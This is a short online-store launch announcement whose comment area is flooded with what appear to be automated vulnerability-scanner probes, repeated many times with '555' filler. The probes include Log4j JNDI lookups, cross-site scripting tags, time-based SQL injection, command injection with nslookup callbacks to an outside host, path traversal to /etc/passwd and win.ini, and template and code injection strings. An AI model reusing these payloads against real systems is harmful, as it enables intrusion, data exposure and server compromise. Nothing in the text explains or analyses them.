Our online store is officially up and running. Stock up for the holiday season! We have a great selection of items. We will be constantly adding to our range so please register on our site, this will enable you to keep up to date with any new products.
All shipping is worldwide and will leave the same day an order is placed! Happy Shopping and spread the word!!
This is a sample comment...
${j${::-n}di:dns${::-:}${::-/}/hitpfjdsrsbtobaf02${::-.}bxss.me}zzzz
response.write(9712375*9932688)
%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitlmvgdjclzd45e7f${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
'+response.write(9712375*9932688)+'
"+response.write(9712375*9932688)+"
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.1141-70826.1141.a6a0b${::-.}1${::-.}bxss.me}}
'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=1141-70835&h=1141-a6a0b-2&"></script>
/../../../../../../../../../../windows/system32/BITSADMIN.exe
echo syeisl$()\ xjuvos\nz^xyu||a #' &echo syeisl$()\ xjuvos\nz^xyu||a #|" &echo syeisl$()\ xjuvos\nz^xyu||a #
&echo ziedug$()\ yvlors\nz^xyu||a #' &echo ziedug$()\ yvlors\nz^xyu||a #|" &echo ziedug$()\ yvlors\nz^xyu||a #
|echo anfpdi$()\ snwguo\nz^xyu||a #' |echo anfpdi$()\ snwguo\nz^xyu||a #|" |echo anfpdi$()\ snwguo\nz^xyu||a #
(nslookup hitsfzlgiugiv0d03d.bxss.me||perl -e "gethostbyname('hitsfzlgiugiv0d03d.bxss.me')")
x0ERcgGV
$(nslookup hitdhmpbgabiz055cd.bxss.me||perl -e "gethostbyname('hitdhmpbgabiz055cd.bxss.me')")
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
bcc:074625.1141-70843.1141.a6a0b.19250.2@bxss.me
file:///etc/passwd
&(nslookup hitxodgqdbaygcff15.bxss.me||perl -e "gethostbyname('hitxodgqdbaygcff15.bxss.me')")&'\"`0&(nslookup hitxodgqdbaygcff15.bxss.me||perl -e "gethostbyname('hitxodgqdbaygcff15.bxss.me')")&`'
to@example.com>
bcc:074625.1141-70844.1141.a6a0b.19250.2@bxss.me
|(nslookup hittweykgyork5f1e9.bxss.me||perl -e "gethostbyname('hittweykgyork5f1e9.bxss.me')")
../
./
`(nslookup hitodxbgvokxj39a53.bxss.me||perl -e "gethostbyname('hitodxbgvokxj39a53.bxss.me')")`
;(nslookup hitudmfkaestva027a.bxss.me||perl -e "gethostbyname('hitudmfkaestva027a.bxss.me')")|(nslookup hitudmfkaestva027a.bxss.me||perl -e "gethostbyname('hitudmfkaestva027a.bxss.me')")&(nslookup hitudmfkaestva027a.bxss.me||perl -e "gethostbyname('hitudmfkaestva027a.bxss.me')")
<esi:include src="http://bxss.me/rpb.png"/>
${9999922+9999482}
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
&n942998=v911555
)
Http://bxss.me/t/fit.txt
!(()&&!|*|*|
http://bxss.me/t/fit.txt?.jpg
-1 OR 2+10-10-1=0+0+0+1 --
^(#$!@#$)(()))******
-1 OR 3+10-10-1=0+0+0+1 --
/etc/shells
'.gethostbyname(lc('hitky'.'qllqcbpef8729.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(81).chr(108).chr(90).'
-1 OR 2+221-221-1=0+0+0+1
c:/windows/win.ini
'"()
-1 OR 3+221-221-1=0+0+0+1
bxss.me
".gethostbyname(lc("hitzz"."eesochfib8653.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(66).chr(114).chr(88)."
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
-1' OR 2+360-360-1=0+0+0+1 --
';print(md5(31337));$a='
-1' OR 3+360-360-1=0+0+0+1 --
";print(md5(31337));$a="
-1' OR 2+273-273-1=0+0+0+1 or '0p6o37MQ'='
${@print(md5(31337))}
'&&sleep(27*1000)*qeubtf&&'
-1' OR 3+273-273-1=0+0+0+1 or '0p6o37MQ'='
${@print(md5(31337))}\
"&&sleep(27*1000)*takurs&&"
-1" OR 2+463-463-1=0+0+0+1 --
'.print(md5(31337)).'
-1" OR 3+463-463-1=0+0+0+1 --
'||sleep(27*1000)*vyldtg||'
"||sleep(27*1000)*xbiysv||"
ctime
sleep
p0
(I30
tp1
Rp2
.
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitajbymwejis8434a.'+'bxss.me')
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitajbymwejis8434a."+"bxss.me")+'
"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitajbymwejis8434a.'+'bxss.me')+"
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
"+"A".concat(70-3).concat(22*4).concat(118).concat(82).concat(106).concat(89)+(require"socket"
Socket.gethostbyname("hitid"+"xkkmqvhz382f7.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(105).concat(71).concat(111).concat(76)+(require'socket'
Socket.gethostbyname('hitan'+'grvbpvjue9e52.bxss.me.')[3].to_s)+'
new-online-store-is-open
new-online-store-is-open/.
http://hitmwnipsurgo.bxss.me/
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
'"
'"()&%<zzz><ScRiPt >n6rZ(9065)</ScRiPt>
/xfs.bxss.me
<!--
'"()&%<zzz><ScRiPt >n6rZ(9518)</ScRiPt>
if(now()=sysdate(),sleep(15),0)
9265949
bfg4871<s1﹥s2ʺs3ʹhjl4871
bfgx10695%C0%BEz1%C0%BCz2a%90bcxhjl10695
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
<ScRiPt >n6rZ(9426)</ScRiPt>
<WLNJI1>LCAD8[!+!]</WLNJI1>
<script>n6rZ(9534)</script>
<ScR<ScRiPt>IpT>n6rZ(9173)</sCr<ScRiPt>IpT>
<ScRiPt
>n6rZ(9253)</ScRiPt>
<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9595></ScRiPt>
<isindex type=image src=1 onerror=n6rZ(9005)>
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9283'>
<body onload=n6rZ(9160)>
<img src=//xss.bxss.me/t/dot.gif onload=n6rZ(9514)>
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
<img src=xyz OnErRor=n6rZ(9820)>
<img/src=">" onerror=alert(9789)>
%0D%0A%3C%53%63%52%69%50%74%20%3E%6E%36%72%5A%289650%29%3C%2F%73%43%72%69%70%54%3E
\u003CScRiPt\n6rZ(9956)\u003C/sCripT\u003E
<ScRiPt>n6rZ(9956)</sCripT>
%F6<img zzz onmouseover=n6rZ(91861) //%F6>
<input autofocus onfocus=n6rZ(9536)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
}body{zzz:Expre/**/SSion(n6rZ(9016))}
wPZAk
<ScRiPt >n6rZ(9023)</ScRiPt>
<W577ER>ACAPH[!+!]</W577ER>
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
<ifRAme sRc=9245.com></IfRamE>
<aUCcmaN x=9824>
<img sRc='http://attacker-9852/log.php?
<aTKmUPN<
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
h4IddxO8'; waitfor delay '0:0:15' --
Er7AhGoH'); waitfor delay '0:0:15' --
11jfF2ty')); waitfor delay '0:0:15' --
-5 OR 587=(SELECT 587 FROM PG_SLEEP(15))--
-5) OR 501=(SELECT 501 FROM PG_SLEEP(15))--
-1)) OR 176=(SELECT 176 FROM PG_SLEEP(15))--
6TI31Y8W' OR 891=(SELECT 891 FROM PG_SLEEP(15))--
DFZJKl3R') OR 456=(SELECT 456 FROM PG_SLEEP(15))--
Nj641urG')) OR 959=(SELECT 959 FROM PG_SLEEP(15))--
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@WnhnN


response.write(9398009*9337265)
${j${::-n}di:dns${::-:}${::-/}/hitpqlkplpngn84219${::-.}bxss.me}zzzz
'+response.write(9398009*9337265)+'

'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=1141-97715&h=1141-a6a0b-2&"></script>
"+response.write(9398009*9337265)+"
%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitiehmyduijyb0b29${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA




/../../../../../../../../../../windows/system32/BITSADMIN.exe






${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.1141-97719.1141.a6a0b${::-.}1${::-.}bxss.me}}




echo rugrpl$()\ uregna\nz^xyu||a #' &echo rugrpl$()\ uregna\nz^xyu||a #|" &echo rugrpl$()\ uregna\nz^xyu||a #
&echo qiusrt$()\ rodgbv\nz^xyu||a #' &echo qiusrt$()\ rodgbv\nz^xyu||a #|" &echo qiusrt$()\ rodgbv\nz^xyu||a #
|echo wsxzha$()\ bjtuof\nz^xyu||a #' |echo wsxzha$()\ bjtuof\nz^xyu||a #|" |echo wsxzha$()\ bjtuof\nz^xyu||a #
OS5gtAXa
(nslookup hitnvuarzntmt3d7dd.bxss.me||perl -e "gethostbyname('hitnvuarzntmt3d7dd.bxss.me')")




$(nslookup hitoqyacobdfa277eb.bxss.me||perl -e "gethostbyname('hitoqyacobdfa277eb.bxss.me')")
&(nslookup hitoqztcqlugm3a19a.bxss.me||perl -e "gethostbyname('hitoqztcqlugm3a19a.bxss.me')")&'\"`0&(nslookup hitoqztcqlugm3a19a.bxss.me||perl -e "gethostbyname('hitoqztcqlugm3a19a.bxss.me')")&`'
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
|(nslookup hitgaajilagzf4a386.bxss.me||perl -e "gethostbyname('hitgaajilagzf4a386.bxss.me')")
file:///etc/passwd
to@example.com>
bcc:074625.1141-97726.1141.a6a0b.19250.2@bxss.me


`(nslookup hitjwkvtrpafkd20ee.bxss.me||perl -e "gethostbyname('hitjwkvtrpafkd20ee.bxss.me')")`


../






;(nslookup hitutnpdklzaxc1074.bxss.me||perl -e "gethostbyname('hitutnpdklzaxc1074.bxss.me')")|(nslookup hitutnpdklzaxc1074.bxss.me||perl -e "gethostbyname('hitutnpdklzaxc1074.bxss.me')")&(nslookup hitutnpdklzaxc1074.bxss.me||perl -e "gethostbyname('hitutnpdklzaxc1074.bxss.me')")



















<esi:include src="http://bxss.me/rpb.png"/>












${9999064+10000486}
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg




Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg


/etc/shells

&n963062=v992922
c:/windows/win.ini


bxss.me
















)


!(()&&!|*|*|


^(#$!@#$)(()))******


'.gethostbyname(lc('hitiv'.'tecmuvwi6042f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(85).chr(110).chr(80).'




".gethostbyname(lc("hitud"."vswrnlhn0d3dd.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(81).chr(102).chr(68)."
'"()






-1 OR 2+820-820-1=0+0+0+1 --

'&&sleep(27*1000)*aigjvh&&'


-1 OR 2+190-190-1=0+0+0+1

"&&sleep(27*1000)*zlfown&&"
-1' OR 2+818-818-1=0+0+0+1 --

'||sleep(27*1000)*qgggzk||'
-1' OR 2+188-188-1=0+0+0+1 or 'SUuNDCLM'='

"||sleep(27*1000)*wwtsec||"
-1" OR 2+473-473-1=0+0+0+1 --
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
ctime
sleep
p0
(I30
tp1
Rp2
.


';print(md5(31337));$a='
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitftlwjpbkfo5a782.'+'bxss.me')


";print(md5(31337));$a="
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitftlwjpbkfo5a782."+"bxss.me")+'
${@print(md5(31337))}
"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitftlwjpbkfo5a782.'+'bxss.me')+"
HttP://bxss.me/t/xss.html?%00
${@print(md5(31337))}\


"+"A".concat(70-3).concat(22*4).concat(119).concat(66).concat(117).concat(67)+(require"socket"
Socket.gethostbyname("hitlt"+"ptorbfxt5ff91.bxss.me.")[3].to_s)+"


bxss.me/t/xss.html?%00
'.print(md5(31337)).'












'+'A'.concat(70-3).concat(22*4).concat(114).concat(71).concat(112).concat(69)+(require'socket'
Socket.gethostbyname('hitrq'+'actewhfd0534b.bxss.me.')[3].to_s)+'








new-online-store-is-open








new-online-store-is-open/.






http://hitlcsbnyeeed.bxss.me/


)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))




/xfs.bxss.me


'"
<!--






if(now()=sysdate(),sleep(15),0)



'"()&%<zzz><ScRiPt >48kq(9205)</ScRiPt>
'"()&%<zzz><ScRiPt >48kq(9296)</ScRiPt>







9437204




bfg1459<s1﹥s2ʺs3ʹhjl1459
bfgx8462%C0%BEz1%C0%BCz2a%90bcxhjl8462
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<ScRiPt >48kq(9013)</ScRiPt>

<WKZPWO>UNAAI[!+!]</WKZPWO>

<ScRiPt
>48kq(9508)</ScRiPt>

<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9072></ScRiPt>

<isindex type=image src=1 onerror=48kq(9028)>
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9896'>

<body onload=48kq(9503)>

<img src=//xss.bxss.me/t/dot.gif onload=48kq(9605)>

<img src=xyz OnErRor=48kq(9956)>

<img/src=">" onerror=alert(9717)>
%0D%0A%26%23%78%44%3B%26%23%78%41%3B%3C%53%63%52%69%50%74%20%3E%34%38%6B%71%289533%29%3C%2F%73%43%72%69%70%54%3E

<ScRiPt>48kq(9098)</sCripT>
%F6<img zzz onmouseover=48kq(98291) //%F6>

<input autofocus onfocus=48kq(9379)>
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>

}body{zzz:Expre/**/SSion(48kq(9248))}

T5vxw
<ScRiPt >48kq(9531)</ScRiPt>

<WGFVEV>1J1R9[!+!]</WGFVEV>

<ifRAme sRc=9826.com></IfRamE>

<aGSYOTS x=9483>

<img sRc='http://attacker-9225/log.php?

<aurp5FU<


1 waitfor delay '0:0:15' --


















WHRQDabA'; waitfor delay '0:0:15' --


















a8kOzG72'); waitfor delay '0:0:15' --


















AFd7U9cc')); waitfor delay '0:0:15' --




















uJIkickd' OR 394=(SELECT 394 FROM PG_SLEEP(15))--




VeozLsVZ') OR 373=(SELECT 373 FROM PG_SLEEP(15))--
p0cQ5tK6')) OR 951=(SELECT 951 FROM PG_SLEEP(15))--

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@sasxn




















































555
555
1fX5S8BLO
555
${j${::-n}di:dns${::-:}${::-/}/hitbxmuryinxtc947b${::-.}bxss.me}zzzz
response.write(9026694*9295328)
555'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=1141-103844&h=1141-a6a0b-2&"></script>
%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitzkhwdebgyz19f42${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
'+response.write(9026694*9295328)+'
555
"+response.write(9026694*9295328)+"
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.1141-103847.1141.a6a0b${::-.}1${::-.}bxss.me}}
555
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
555
echo frxawc$()\ icdetl\nz^xyu||a #' &echo frxawc$()\ icdetl\nz^xyu||a #|" &echo frxawc$()\ icdetl\nz^xyu||a #
555
555
&echo yaxlio$()\ esfevu\nz^xyu||a #' &echo yaxlio$()\ esfevu\nz^xyu||a #|" &echo yaxlio$()\ esfevu\nz^xyu||a #
|echo nhjvsz$()\ bplrjm\nz^xyu||a #' |echo nhjvsz$()\ bplrjm\nz^xyu||a #|" |echo nhjvsz$()\ bplrjm\nz^xyu||a #
(nslookup hitjahxqkdgrcd8365.bxss.me||perl -e "gethostbyname('hitjahxqkdgrcd8365.bxss.me')")
hlemDF9B
555
555
$(nslookup hitilxrsfmdha682e5.bxss.me||perl -e "gethostbyname('hitilxrsfmdha682e5.bxss.me')")
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
&(nslookup hitrlewoaqfelb7f73.bxss.me||perl -e "gethostbyname('hitrlewoaqfelb7f73.bxss.me')")&'\"`0&(nslookup hitrlewoaqfelb7f73.bxss.me||perl -e "gethostbyname('hitrlewoaqfelb7f73.bxss.me')")&`'
file:///etc/passwd
555
bcc:074625.1141-103853.1141.a6a0b.19250.2@bxss.me
555
|(nslookup hitlrncqhectsbd99c.bxss.me||perl -e "gethostbyname('hitlrncqhectsbd99c.bxss.me')")
to@example.com>
bcc:074625.1141-103855.1141.a6a0b.19250.2@bxss.me
../555
555
555
`(nslookup hititxfqcwlkme804e.bxss.me||perl -e "gethostbyname('hititxfqcwlkme804e.bxss.me')")`
555
555
555
555
;(nslookup hitehowssdbmifc222.bxss.me||perl -e "gethostbyname('hitehowssdbmifc222.bxss.me')")|(nslookup hitehowssdbmifc222.bxss.me||perl -e "gethostbyname('hitehowssdbmifc222.bxss.me')")&(nslookup hitehowssdbmifc222.bxss.me||perl -e "gethostbyname('hitehowssdbmifc222.bxss.me')")
555
555
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
${10000495+9999123}
555
555
555
555
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555&n952715=v933991
Http://bxss.me/t/fit.txt
555
555
http://bxss.me/t/fit.txt?.jpg
/etc/shells
555
c:/windows/win.ini
bxss.me
555
555
555
555
555
)
555
!(()&&!|*|*|
555
^(#$!@#$)(()))******
'"()
'.gethostbyname(lc('hitmp'.'wmjvdwdyee214.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(83).chr(98).chr(87).'
555
555
555
555
555
555
555
".gethostbyname(lc("hitfc"."cxltarvl5ee13.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(83).chr(108).chr(86)."
555
555'&&sleep(27*1000)*iinxyq&&'
-1 OR 2+854-854-1=0+0+0+1 --
555
555"&&sleep(27*1000)*vujxhe&&"
-1 OR 2+400-400-1=0+0+0+1
555'||sleep(27*1000)*qgjyuz||'
-1' OR 2+774-774-1=0+0+0+1 --
555"||sleep(27*1000)*esyrsq||"
555
-1' OR 2+708-708-1=0+0+0+1 or '14t3glb6'='
-1" OR 2+483-483-1=0+0+0+1 --
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitjgpqkokapo54c22.'+'bxss.me')
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitjgpqkokapo54c22."+"bxss.me")+'
";print(md5(31337));$a="
555
"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitjgpqkokapo54c22.'+'bxss.me')+"
${@print(md5(31337))}
555
555
${@print(md5(31337))}\
555
'.print(md5(31337)).'
555
555
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
555
bxss.me/t/xss.html?%00
555
555
"+"A".concat(70-3).concat(22*4).concat(99).concat(86).concat(110).concat(78)+(require"socket"
Socket.gethostbyname("hitjc"+"qmraccvk966f9.bxss.me.")[3].to_s)+"
555
'+'A'.concat(70-3).concat(22*4).concat(110).concat(89).concat(104).concat(84)+(require'socket'
Socket.gethostbyname('hityl'+'ajblvrofd2fa6.bxss.me.')[3].to_s)+'
555
new-online-store-is-open
555
new-online-store-is-open/.
555
555
http://hitvxrggzfvkn.bxss.me/
555
if(now()=sysdate(),sleep(15),0)
555
555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
/xfs.bxss.me
'"
555'"()&%<zzz><ScRiPt >1OOW(9111)</ScRiPt>
<!--
555
555
555
'"()&%<zzz><ScRiPt >1OOW(9669)</ScRiPt>
5559361259
bfg4682<s1﹥s2ʺs3ʹhjl4682
bfgx8588%C0%BEz1%C0%BCz2a%90bcxhjl8588
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >1OOW(9291)</ScRiPt>
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
555<WGNLJ9>RFD1T[!+!]</WGNLJ9>
555<script>1OOW(9912)</script>
555<ScR<ScRiPt>IpT>1OOW(9408)</sCr<ScRiPt>IpT>
555<ScRiPt
>1OOW(9348)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9711></ScRiPt>
555<isindex type=image src=1 onerror=1OOW(9221)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9355'>
555<body onload=1OOW(9774)>
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555<img src=//xss.bxss.me/t/dot.gif onload=1OOW(9992)>
555<img src=xyz OnErRor=1OOW(9619)>
555<img/src=">" onerror=alert(9118)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%31%4F%4F%57%289324%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\1OOW(9776)\u003C/sCripT\u003E
555<ScRiPt>1OOW(9441)</sCripT>
%F6<img zzz onmouseover=1OOW(97211) //%F6>
555<input autofocus onfocus=1OOW(9319)>
-1; waitfor delay '0:0:15' --
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(1OOW(9653))}
555Ssaen
<ScRiPt >1OOW(9478)</ScRiPt>
555<WHJFIE>SQJ3A[!+!]</WHJFIE>
555<ifRAme sRc=9568.com></IfRamE>
555<apNdMPw x=9241>
555<img sRc='http://attacker-9249/log.php?
555<a2DfIaQ<
-1); waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
-1)); waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555
1 waitfor delay '0:0:15' --
555
555
555
555
555
555
555
LGh7WdsY'; waitfor delay '0:0:15' --
555
555
555
555
${j${::-n}di:dns${::-:}${::-/}/hitdytpggpsot8ca4a${::-.}bxss.me}zzzz
response.write(9235582*9839865)
555'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=1141-104765&h=1141-a6a0b-2&"></script>
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
'+response.write(9235582*9839865)+'
555
555
"+response.write(9235582*9839865)+"
%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitzfqlbqtyix84028${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
555
555
echo etceyc$()\ jtxnad\nz^xyu||a #' &echo etceyc$()\ jtxnad\nz^xyu||a #|" &echo etceyc$()\ jtxnad\nz^xyu||a #
555
555
&echo bqjyjm$()\ rfmrrs\nz^xyu||a #' &echo bqjyjm$()\ rfmrrs\nz^xyu||a #|" &echo bqjyjm$()\ rfmrrs\nz^xyu||a #
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.1141-104874.1141.a6a0b${::-.}1${::-.}bxss.me}}
q6Z4klOU
555
|echo fvqlem$()\ guogim\nz^xyu||a #' |echo fvqlem$()\ guogim\nz^xyu||a #|" |echo fvqlem$()\ guogim\nz^xyu||a #
555
555
555
(nslookup hittnzdvqryoy18cb1.bxss.me||perl -e "gethostbyname('hittnzdvqryoy18cb1.bxss.me')")
XQhKLBsr'); waitfor delay '0:0:15' --
$(nslookup hithlnyqfgyby4c6f4.bxss.me||perl -e "gethostbyname('hithlnyqfgyby4c6f4.bxss.me')")
../../../../../../../../../../../../../../etc/passwd
555
../../../../../../../../../../../../../../windows/win.ini
555
&(nslookup hittfstgjwjqde19fd.bxss.me||perl -e "gethostbyname('hittfstgjwjqde19fd.bxss.me')")&'\"`0&(nslookup hittfstgjwjqde19fd.bxss.me||perl -e "gethostbyname('hittfstgjwjqde19fd.bxss.me')")&`'
file:///etc/passwd
555
bcc:074625.1141-104876.1141.a6a0b.19250.2@bxss.me
555
to@example.com>
bcc:074625.1141-104877.1141.a6a0b.19250.2@bxss.me
555
../555
|(nslookup hitpquggcitsy5aa85.bxss.me||perl -e "gethostbyname('hitpquggcitsy5aa85.bxss.me')")
555
555
555
555
555
555
555
`(nslookup hitzkwydtywewd532a.bxss.me||perl -e "gethostbyname('hitzkwydtywewd532a.bxss.me')")`
555
555
555
;(nslookup hitiroycfhnkh03c83.bxss.me||perl -e "gethostbyname('hitiroycfhnkh03c83.bxss.me')")|(nslookup hitiroycfhnkh03c83.bxss.me||perl -e "gethostbyname('hitiroycfhnkh03c83.bxss.me')")&(nslookup hitiroycfhnkh03c83.bxss.me||perl -e "gethostbyname('hitiroycfhnkh03c83.bxss.me')")
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
555
555
${10000393+10000277}
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
555
Http://bxss.me/t/fit.txt
555&n947105=v928357
http://bxss.me/t/fit.txt?.jpg
555
555
555
/etc/shells
555
555
c:/windows/win.ini
555
bxss.me
555
555
555
YWU4aQHZ')); waitfor delay '0:0:15' --
555
555
)
555
555
!(()&&!|*|*|
555
^(#$!@#$)(()))******
'"()
555
555
555
555
'.gethostbyname(lc('hitos'.'vrpbxugs34069.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(80).chr(99).chr(81).'
555
555
555
555
555
".gethostbyname(lc("hitdu"."fywujtxbb2056.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(65).chr(114).chr(84)."
-1 OR 2+117-117-1=0+0+0+1 --
555'&&sleep(27*1000)*qexgpn&&'
-1 OR 2+994-994-1=0+0+0+1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555"&&sleep(27*1000)*nuowhw&&"
-1' OR 2+387-387-1=0+0+0+1 --
555
';print(md5(31337));$a='
555'||sleep(27*1000)*vdahpt||'
-1' OR 2+57-57-1=0+0+0+1 or 'f7fpfnQD'='
";print(md5(31337));$a="
555"||sleep(27*1000)*ucynjn||"
-1" OR 2+244-244-1=0+0+0+1 --
${@print(md5(31337))}
555
${@print(md5(31337))}\
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitwzltapnbse40e9d.'+'bxss.me')
'.print(md5(31337)).'
555
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitwzltapnbse40e9d."+"bxss.me")+'
555
555
"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitwzltapnbse40e9d.'+'bxss.me')+"
555
555
555
555
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
555
"+"A".concat(70-3).concat(22*4).concat(118).concat(81).concat(112).concat(88)+(require"socket"
Socket.gethostbyname("hitso"+"rouowqyy71886.bxss.me.")[3].to_s)+"
bxss.me/t/xss.html?%00
555
